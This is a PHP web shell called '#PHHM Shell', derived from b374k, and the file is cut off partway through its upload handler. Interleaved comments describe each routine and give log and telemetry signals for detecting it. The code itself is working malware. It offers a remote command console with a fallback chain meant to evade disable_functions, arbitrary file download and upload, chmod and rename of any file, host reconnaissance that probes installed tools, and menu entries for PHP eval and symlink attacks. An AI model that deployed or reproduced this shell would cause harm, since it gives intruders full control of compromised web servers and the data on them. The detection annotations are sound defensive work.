- <?php
- /*******************************************************************
- *******************************************************************
- *** #PHHM Shell ***
- *** Coded by nhax ***
- *** Fuck self-claimer ! ***
- *** Cai Kacak ***
- *** <3 <3 <3 <3 <3 ***
- *******************************************************************
- *******************************************************************/
- //error_reporting(0);
- if(isset($_GET['cwd'])){ $cwd = $_GET['cwd']; chdir($cwd); } else { $cwd = getcwd().DIRECTORY_SEPARATOR; chdir($cwd); } /*
-  * Defender note: the working directory is taken directly from the "cwd" query
-  * parameter and passed to chdir() with no validation, and no authentication check
-  * is visible anywhere in this part of the file. Requests to a PHP file carrying a
-  * "cwd=" parameter that holds an absolute filesystem path are therefore a useful
-  * pattern when hunting through web-server access logs.
-  */
- if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; // $safemode mirrors the safe_mode ini setting
- if(strtolower(substr(php_uname(),0,3)) == "win") $win = TRUE; else $win = FALSE; // $win is TRUE when php_uname() starts with "win" (case-insensitive)
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; // $posix is TRUE only when both POSIX lookup functions exist
- global $cwd; // has no effect when this file runs at top-level scope
- function perintah($perintah) { /*
-  * Run $perintah ("perintah" is Malay/Indonesian for "command") as an operating-system
-  * command and return whatever it printed, as a string.
-  *
-  * The first usable primitive is taken, in this order: exec, shell_exec, system,
-  * passthru, then popen. Every call is prefixed with @, so failures emit no PHP
-  * warnings. An empty command returns ''; when no primitive works the literal
-  * "Perintah() Disabled! :(" is returned instead.
-  *
-  * Defender note: because of this fallback chain, a disable_functions hardening list
-  * that leaves out any one of the five functions does not stop this routine. The
-  * behaviour to alert on is the PHP or web-server process spawning a shell or other
-  * child process at all.
-  */
- $res = '';
- if (!empty($perintah)) {
- if(function_exists('exec')) { @exec($perintah,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($perintah); }
- elseif(function_exists('system')) { @ob_start(); @system($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
- elseif(function_exists('passthru')) { @ob_start(); @passthru($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
- elseif(@is_resource($f = @popen($perintah,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }
- else { $res = "Perintah() Disabled! :("; }
- }
- return $res;
- }
- function ukuran($file){ /*
-  * Return the size of $file as a short human-readable string ("ukuran" is
-  * Malay/Indonesian for "size"): bytes up to 1024, then kb, mb and gb, each rounded
-  * to two decimals. A size of 0 or a failed filesize() call yields "0 b".
-  * Sizes above 1024^4 bytes match no branch, so the function returns nothing (null).
-  */
- if($size = filesize($file)){
- if($size <= 1024){
- return "$size b";
- } else {
- if($size <= 1024*1024){
- $size = round($size / 1024,2);
- return "$size kb";
- } elseif($size <= 1024*1024*1024){
- $size = round($size / 1024 / 1024,2);
- return "$size mb";
- } elseif($size <= 1024*1024*1024*1024){
- $size = round($size / 1024 / 1024 / 1024,2);
- return "$size gb";
- }
- }
- }
- else return "0 b";
- }
- function showstat($stat){ /*
-  * Render a capability flag as an HTML badge: a lime "ON" when $stat is "on",
-  * a red "OFF" for every other value.
-  */
- if ($stat=="on") {
- return "<b><font style='color: lime'>ON</font></b>";
- } else {
- return "<b><font style='color: red'>OFF</font></b>";
- }
- }
- function testperl() { if (perintah('perl -h')) { return showstat("on"); } else { return showstat("off"); } } /*
-  * Capability probes shown on the "info" page. Two kinds appear below:
-  *  - perl, fetch, wget, python and gcc are tested by actually running the tool's
-  *    help command through perintah() and treating any non-empty output as "on";
-  *  - Oracle, PostgreSQL, MsSQL, cURL and MySQL are tested with function_exists()
-  *    on one function of the matching PHP extension.
-  *
-  * Defender note: this is host reconnaissance. In process-creation telemetry it shows
-  * up as the web server's PHP process launching "perl -h", "fetch --help",
-  * "wget --help", "python -h" and "gcc -h" back to back within a single request,
-  * which is a distinctive sequence to alert on.
-  */
- function testfetch() { if(perintah('fetch --help')) { return showstat("on"); } else { return showstat("off"); } }
- function testwget() { if (perintah('wget --help')) { return showstat("on"); } else { return showstat("off"); } }
- function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } }
- function testpostgresql() { if (function_exists('pg_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testcurl() { if (function_exists('curl_version')) { return showstat("on"); } else { return showstat("off"); } }
- function testmysql() { if (function_exists('mysql_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testpython() { if(perintah("python -h")){ return showstat("on"); } else { return showstat("off"); } }
- function testgcc() { if(perintah("gcc -h")){ return showstat("on"); } else { return showstat("off"); } }
- function b64wrt($file, $benda){ /*
-  * Base64-decode $benda and write the result to $file, truncating any existing file.
-  * Returns 1 when fwrite() wrote something and 0 otherwise; when the file cannot be
-  * opened it echoes an error line and returns nothing. The handle is never closed
-  * explicitly.
-  *
-  * Defender note: this is how the script drops the helper files it carries as
-  * base64 string literals elsewhere in the file. A scanner that only looks for
-  * plaintext keywords will not see those payloads, so decode long base64 literals
-  * during triage, and treat script or .htaccess files newly created by the
-  * web-server user as suspect.
-  */
- if($fo = fopen($file, "w")){
- return (fwrite($fo, base64_decode($benda)) ? 1 : 0);
- } else {
- echo "Failed to open $file for writing <br />";
- }
- }
- if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on"){ /*
-  * Builds the HTML badge for the magic-quotes state that the "info" page prints.
-  * Triage note: get_magic_quotes_gpc() was removed in PHP 8.0, so this sample was
-  * written for older PHP runtimes.
-  */
- $quot = "<font style='color:red'>ON</font>";
- } else {
- $quot = "<font style='color: lime'>OFF</font>";
- }
- if(isset($_GET['action']) && $_GET['action'] == "dl" && $_GET['file'] != ""){ /*
-  * File download handlers. "action=dl" returns the file named by the "file" query
-  * parameter as an attachment; "action=dlgzip" does the same after gzip-compressing
-  * it. Both read the whole file into memory, set the headers and exit, so nothing
-  * else on the page is rendered.
-  *
-  * Defender note: the path is used exactly as supplied, with no restriction to a
-  * base directory, so any file readable by the PHP user can leave the host this way.
-  * In access logs look for "action=dl" or "action=dlgzip" together with "file=",
-  * answered with Content-Type application/octet-stream or application/x-gzip.
-  */
- $file = $_GET['file'];
- $filez = file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file)."\";");
- echo $filez;
- exit;
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "dlgzip" && $_GET['file'] != ""){
- $file = $_GET['file'];
- $filez = gzencode(file_get_contents($file));
- header("Content-Type: application/x-gzip\n");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
- echo $filez;
- exit;
- }
- $bytes = disk_free_space("."); /*
-  * Formats free and total disk space of the current directory's volume for the
-  * "info" page. The unit index is floor(log base 1024 of the byte count), capped at
-  * the last entry of the prefix list; the value is printed with two decimals.
-  * Note that both prefix lists go from 'TB' straight to 'EB' (there is no 'PB').
-  */
- $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $base = 1024;
- $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
- $totalspace_bytes = disk_total_space(".");
- $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $totalspace_bases = 1024;
- $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
- $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
- $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
- if(!$win){ /*
-  * Works out who the script is running as and builds a prompt string.
-  * Non-Windows: runs "whoami" and "id" through perintah() and tidies the output with
-  * rapih() (defined further down the file). Windows: uses get_current_user() and
-  * builds $letters, a row of links for every drive letter A-Z that exists.
-  * On Windows $_GET['cwd'] is read without an isset() check, and both arms of the
-  * inner if append the same text.
-  *
-  * Defender note: this block is outside any "action" test, so on a non-Windows host
-  * every page load makes the PHP process spawn "whoami" and "id". That pair coming
-  * from a web-server process is a strong detection signal.
-  */
- if(!$user = rapih(perintah("whoami"))) $user = "";
- if(!$id = rapih(perintah("id"))) $id = "";
- $prompt = $user." \$ ";
- } else {
- $user = get_current_user();
- $id = $user;
- $prompt = $user." »";
- $v = explode("\\", $_GET['cwd']);
- $v = $v[0];
- $letters = "";
- foreach (range("A","Z") as $letter){
- if (is_dir($letter.":\\")){
- $letters.= " <a href=\"?cwd=".$letter.":\\\">[ ";
- if ($letter.":" != $v){
- $letters .= $letter;
- } else {
- $letters.= $letter;
- }
- $letters.= " ]</a> ";
- }
- }
- }
- $cwds = explode(DIRECTORY_SEPARATOR,$cwd); /*
-  * Builds $cwdurl, a breadcrumb of links: one "?cwd=<prefix>" link per component of
-  * the current path, where <prefix> is the path from the root down to that
-  * component. The path text is placed into the HTML without escaping.
-  */
- $cwdurl = "";
- for($i = 0 ; $i < sizeof($cwds)-1 ; $i++){
- $pathz= "";
- for($j= 0 ; $j <= $i ; $j++){
- $pathz .= $cwds[$j].DIRECTORY_SEPARATOR;
- }
- $cwdurl .= "<a href=\"?cwd=".$pathz."\">".$cwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
- }
- if(isset($_POST['rename'])){ /*
-  * POST handlers for the file-manager forms. "rename" renames $cwd.oldname to
-  * $cwd.newname. "chmod" and "chmod_folder" are identical: both change the mode of
-  * $cwd.name to the octal value in "newvalue", prefixing a 0 when three digits are
-  * given.
-  *
-  * Defender note: the names are concatenated onto $cwd as received, with no check
-  * that the result stays inside any directory. POST bodies containing the fields
-  * oldname/newname or name/newvalue, sent to a URL with a "cwd=" parameter, identify
-  * these operations in request logs or WAF captures; unexpected permission changes
-  * under the web root are the matching host-side signal.
-  */
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- rename($cwd.$old,$cwd.$new);
- $file = $cwd.$new;
- }
- if(isset($_POST['chmod'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- chmod($cwd.$name,octdec($value));
- $file = $cwd.$name;
- }
- if(isset($_POST['chmod_folder'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- chmod($cwd.$name,octdec($value));
- $file = $cwd.$name;
- }
- function clearspace($text){ // Replace every space with "_"; the file manager uses the result inside HTML id attributes.
- return str_replace(" ","_",$text);
- }
- function rapih($text){ // Tidy command output: remove literal "<br />" markers, then trim surrounding whitespace.
- return trim(str_replace("<br />","",$text));
- }
- function magicboom($text){ /*
-  * Undo magic-quotes escaping: returns $text unchanged when magic quotes are off,
-  * otherwise strips the added backslashes. The script passes POSTed paths and PHP
-  * code through this so that they reach the filesystem and eval() exactly as typed.
-  */
- if (!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function filemanager(){ /*
-  * Echo an HTML table listing the current directory: first "." and "..", then the
-  * other folders, then the files, each group sorted by name. For every entry it
-  * shows a writable/not-writable flag, size (files only), owner:group, permission
-  * string, modification time and action links, plus hidden rename and chmod forms.
-  *
-  * The listing is read with opendir("."), so it reflects whatever directory the
-  * earlier chdir() on the "cwd" parameter selected. Owner and group names come from
-  * the posix_* functions when available; otherwise the script's own user is shown.
-  * Entry names are written into links and attributes without HTML escaping. The
-  * closedir() after die() is never reached.
-  *
-  * Defender note: the links built here reveal the script's request vocabulary, which
-  * is useful for log hunting: "action=" values edit, mkdir, rmdir, view, del, dl and
-  * dlgzip, always alongside "cwd=" and usually "file=" or "folder=". The handlers
-  * for several of these are not in this part of the file.
-  */
- global $cwd, $cwdurl, $letters, $win, $posix, $user;
- $files = array();
- $folders = array();
- if($op = @opendir(".")){
- while($re = readdir($op)){
- if(is_file($re)){
- $files[] = $re;
- } elseif(is_dir($re)){
- $folders[] = $re;
- }
- }
- @closedir($op);
- } else {
- die("Failed to opendir()\n</body>");
- @closedir($op);
- }
- sort($files);
- sort($folders);
- $path = explode(DIRECTORY_SEPARATOR, $cwd);
- $tree = sizeof($path);
- $parent = "";
- $buff = "";
- if($tree > 2){
- for($i=0;$i<$tree-2;$i++){
- $parent .= $path[$i].DIRECTORY_SEPARATOR;
- }
- } else {
- $parent = $cwd;
- }
- $buff .= "<span class=\"fileman\">\n".
- "<table width=\"100%\">\n".
- "<tr>\n".
- " <th style=\"width: 25%;\">name</th>\n".
- " <th style=\"width: 5%;\">size</th>\n".
- " <th style=\"width: 10%;\">owner:group</th>\n".
- " <th style=\"width: 10%;\">perms</th>\n".
- " <th style=\"width: 10%;\">modified</th>\n".
- " <th style=\"width: 16%;\">actions</th>\n".
- "</tr>\n";
- foreach($folders as $folder){
- if($folder == "."){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$cwd."\" title=\"CHDIR to Self\">".$folder."</a> − ".(is_writable($cwd) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($cwd))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <span id=\"titik1\">\n".
- " <a href=\"?cwd=".$cwd."&action=edit&file=".$cwd."newfile.php\" title=\"new file\">new file</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>\n".
- " <form action=\"?\" method=\"get\" id=\"titik1_form\" style=\"display:none;margin:0;padding:0;\"> \n".
- " <input type=\"hidden\" name=\"cwd\" value=\"".$cwd."\">\n".
- " <input type=\"hidden\" name=\"action\" value=\"mkdir\">\n".
- " New folder: <input type=\"text\" name=\"folder\" placeholder=\"Folder Name\" class=\"kotak\">\n".
- " <input type=\"submit\" value=\"Go\" class=\"kotak\">\n".
- " </form>\n".
- " </span>\n".
- " </td>\n".
- "</tr>";
- } elseif($folder == ".."){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$parent."\" title=\"CHDIR to ".$parent."\">".$folder."</a> − ".(is_writable($parent) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
- " <td style=\"text-align: center;\">-</td>\n".
- "</tr>";
- } else {
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\">\n".
- " <a id=\"".clearspace($folder)."_link\" href=\"?cwd=".$cwd.$folder.DIRECTORY_SEPARATOR."\" title=\"CHDIR to ".$cwd.$folder.DIRECTORY_SEPARATOR."\">[ ".$folder." ]</a> − ".(is_writable($cwd.$folder) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
- " <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />\n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($cwd.$folder)."</a>\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
- " <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> \n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$folder)), -4)."\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"?cwd=".$cwd."&action=rmdir&folder=".$cwd.$folder."\">delete</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>\n".
- " </td>\n".
- "</tr>";
- }
- }
- foreach($files as $file){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($file));
- $group = posix_getgrgid(filegroup($file));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\">\n".
- " <a id=\"".clearspace($file)."_link\" href=\"?cwd=".$cwd."&action=view&file=".str_replace(" ", "+", $cwd.$file)."\" title=\"View file ".$file."\">".$file."</a> − ".(is_writable($cwd.$file) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
- " <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />\n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".ukuran($file)."</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\">".get_perms($cwd.$file)."</a>\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
- " <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> \n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$file)), -4)."\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($file))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"?cwd=".$cwd."&action=edit&file=".str_replace(" ", "+", $cwd.$file)."\" title=\"Edit ".$cwd.$file."\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?cwd=".$cwd."&action=del&file=".$cwd.$file."\">delete</a> | <a href=\"?cwd=".$cwd."&action=dl&file=".$cwd.$file."\">download</a> (<a href=\"?cwd=".$cwd."&action=dlgzip&file=".$cwd.$file."\">gz</a>)\n".
- " </td>\n".
- "</tr>";
- }
- $buff .= "</table>\n</span>";
- echo $buff;
- }
- function get_perms($file){ /*
-  * Return the nine-character rwx permission string of $file (owner, group, other),
-  * built by testing each permission bit of fileperms(). No file-type character and
-  * no setuid/setgid/sticky bits are shown. If fileperms() fails or returns 0, the
-  * ten-character placeholder "??????????" is returned instead.
-  */
- if($mode=fileperms($file)){
- $perms = "";
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- else return "??????????";
- }
- // folder2 //
- /*if(is_writable($cwd)){
- if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
- if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
- }*/
- ?>
- <!--
- --------------------------------------------------------------------------
- - Official release
- - Coded by Cai@nhax based on b374k NEC v3
- - Gua hanya reParse & fix & remove serba sedikit benda yang ada dalam ni
- - 100% Credit to REAL coder
- - Follow @0xCai
- - "Majulah Hejes untuk negara"
- -
- - #PHHM #HEJES #GILA #HEMPAS
- ---------------------------------------------------------------------------
- -->
- <html>
- <head>
- <title>#PHHM Shell</title>
- <script type="text/javascript">
- function tukar(lama,baru){ /*
-  * Swap two page elements ("tukar" is Malay for "swap"; lama = old, baru = new):
-  * hide the element whose id is lama and show the one whose id is baru. The file
-  * manager uses it to toggle between a name/permission link and its inline form.
-  */
- document.getElementById(lama).style.display = 'none';
- document.getElementById(baru).style.display = 'block';
- }
- </script>
- <link rel="icon" type="image/png" href="http://www.iconsdb.com/icons/preview/black/x-mark-4-xl.png" />
- <style>
- body { background: #000; color: #fff; font-family: Tahoma; font-size: 13px; padding-top: 1em; }
- body a { color: #f00; text-decoration: none; }
- * a:hover { text-decoration: underline; }
- footer { border-top: 0; position: fixed; left:0px; right:0px; bottom:0px; text-align: Right; font-family: Courier New; color: gray; }
- footer:hover { color: #fff; }
- fieldset { border-color: #fff; border-style: solid; border-radius: 3px; background: #111; }
- fieldset:hover { background: #101010; }
- #menu a { border: 1px solid #f00; color: #f00; padding: 5px; padding-left: 3em; padding-right: 3em; text-decoration: none; }
- #menu a:hover { border: 1px solid #fff; border-radius: 1px; color: #fff; }
- #menu a:active { border: 1px solid #0f0; color: #0f0; }
- .fileman { padding: 2px; }
- .fileman * { color: #f00; }
- .fileman table { border: 0; }
- .fileman tr:hover { background: #744F4F; }
- .fileman th { color: #fff; background: #111; }
- .fileman td,th { border: 1px solid #f00; font-family: Arial; font-size: 13px; padding: 2px; border-radius: 2px; }
- .fileman a { color: #2BA8EC; text-decoration: none; }
- .fileman a:hover,active { color: gray; }
- .kotak { border: 1px solid #f00; border-radius: 1px; padding: 1px; padding-left: 3px; padding-right: 3px; background: #111; font-family: Tahoma; color: #fff; }
- .kotak:active { box-shadow: 0px 0px 5px #f00; }
- h1.cantik { border: 1px solid #fff; border-radius: 3px; text-align: Center; font-family: Calibri; }
- #viewfile { background: #111; border: 1px solid #fff; border-radius: 3px; padding: 5px; }
- </style>
- </head>
- <body>
- <div id="menu" align="center">
- <a href="?" title="Main">Main</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=info" title="Info">Info</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=shell" title="Shell">Shell</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=upload" title="Uploader">Upload</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=eval" title="Eval PHP Codes">Eval PHP</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=phpinfo" title="PHP Info">PhpInfo</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=tools" title="Tools">Tools</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=jumping" title="Jumping">Jumping</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=sym_menu" title="Symlink: menu">Symlink</a>
- <br /><br />
- </div>
- <?php
- if($win){ /*
-  * Page header: prints the breadcrumb built earlier ($cwdurl), the drive-letter
-  * links on Windows, and a shortcut link to the server's document root. All values
-  * are written into the HTML without escaping.
-  */
- echo $cwdurl . " − ". $letters;
- } else {
- echo $cwdurl;
- }
- echo "− <a href=\"?cwd=".$_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR."\" title=\"Document Root\">[ Doc. Root ]</a><br /><hr color=\"red\"><br />";
- if(isset($_GET['action']) && $_GET['action'] == "info"){ /*
-  * "action=info": environment reconnaissance page. It prints the web-server
-  * software string, the full php_uname() output, the effective user (via "id" or
-  * "whoami"), the client and server IP addresses, free and total disk space, the
-  * result of every test*() capability probe, the safe_mode and magic-quotes state,
-  * and the current disable_functions list.
-  *
-  * Defender note: the disable_functions line tells the operator which hardening is
-  * in place. In telemetry this page is the request that triggers the burst of
-  * tool-probing child processes from the test*() functions.
-  */
- echo "<form action=\"?cwd=".$cwd."&action=info\" method=\"post\">\n".
- "<h1 class=\"cantik\">Server Info</h1>\n".
- $_SERVER['SERVER_SOFTWARE'] . "<br />\n".
- php_uname("a") . "<br />\n";
- if($posix) echo rapih(perintah("id")) . "<br />\n";
- elseif($win) echo rapih(perintah("whoami")) . "<br />\n";
- echo "Your IP: " . $_SERVER['REMOTE_ADDR'] . " | Server IP: " . $_SERVER['SERVER_ADDR'] . "<br />\n".
- "Free " . $freespace_show . " of " . $totalspace_show . "<br />\n".
- "Perl: ".testperl()." | Fetch: ".testfetch()." | WGet: ".testwget()." | cURL: ".testcurl()." | Oracle: ".testoracle()." | PostgreSQL: ".testpostgresql()." | MsSQL: ".testmssql()." | MySQL: ".testmysql()." | Python: ".testpython()." | GCC: ".testgcc()."<br />\n";
- if($safemode){
- echo "Safemode is <span style=\"color: red\">ON</span><br />\n";
- } else {
- echo "Safemode is <span style=\"color: lime\">OFF</span><br />\n";
- }
- echo "Magic Quotes is ".$quot."<br />";
- if(ini_get("disable_functions") == ""){
- echo $dsbf = "<span style=\"color: #0f0;\">NONE</span>";
- } else {
- echo $dsbf = "<span style=\"color: #f00;\">".ini_get("disable_functions")."</span>";
- }
- echo "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "shell"){ /*
-  * "action=shell": command console. When the form is submitted, the POST field
-  * "cmd" is passed unmodified to perintah() and the HTML-escaped output is shown in
-  * a read-only textarea.
-  *
-  * Defender note: this is remote command execution as the web-server user. It
-  * appears as POST requests to "?cwd=...&action=shell" with a "cmd" field, each one
-  * paired with a child process of the PHP runtime. Request-body logging or WAF
-  * inspection of the "cmd" field recovers what was run.
-  */
- echo "<form action=\"?cwd=$cwd&action=shell\" method=\"post\">\n".
- "<h1 class=\"cantik\">CMD/Shell</h1>\n".
- "<textarea cols=\"100\" rows=\"25\" name=\"out\" class=\"kotak\" readonly>\n";
- if(isset($_POST['submit'])){
- echo htmlspecialchars(perintah($_POST['cmd']));
- }
- echo "</textarea> <br />\n".
- "<input type=\"text\" name=\"cmd\" style=\"width: 50%;\" placeholder=\"cmd\" class=\"kotak\">\n".
- "<input type=\"submit\" name=\"submit\" class=\"kotak\">\n".
- "</form>\n";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "upload"){ /*
-  * "action=upload": file uploader. The destination is the POST field "path" (default:
-  * the current directory) with the client-supplied file name appended; the upload is
-  * moved there with move_uploaded_file() and a link to the result is printed.
-  *
-  * Defender note: neither the target directory nor the file name or type is checked,
-  * so any location writable by the web-server user can receive any file. Useful
-  * controls are denying script execution in writable directories and file-integrity
-  * monitoring on the web root; multipart POSTs to "action=upload" are the log trace.
-  */
- echo "<form action=\"?cwd=$cwd&action=upload\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\">\n".
- " <h1 class=\"cantik\">File Uploader</h1>\n".
- " File: <input type=\"file\" name=\"file\" class=\"kotak\" size=\"50\"> <br />\n".
- " Path: <input type=\"text\" name=\"path\" value=\"$cwd\" style=\"width: 25%;\" class=\"kotak\"> <br />\n".
- " <input type=\"submit\" name=\"submit\" value=\"upload file\" class=\"kotak\"> <br />\n".
- "</form>\n";
- if(isset($_POST['submit'])){
- if(is_uploaded_file($_FILES['file']['tmp_name'])){
- $pindah = magicboom($_POST['path']).$_FILES['file']['name'];
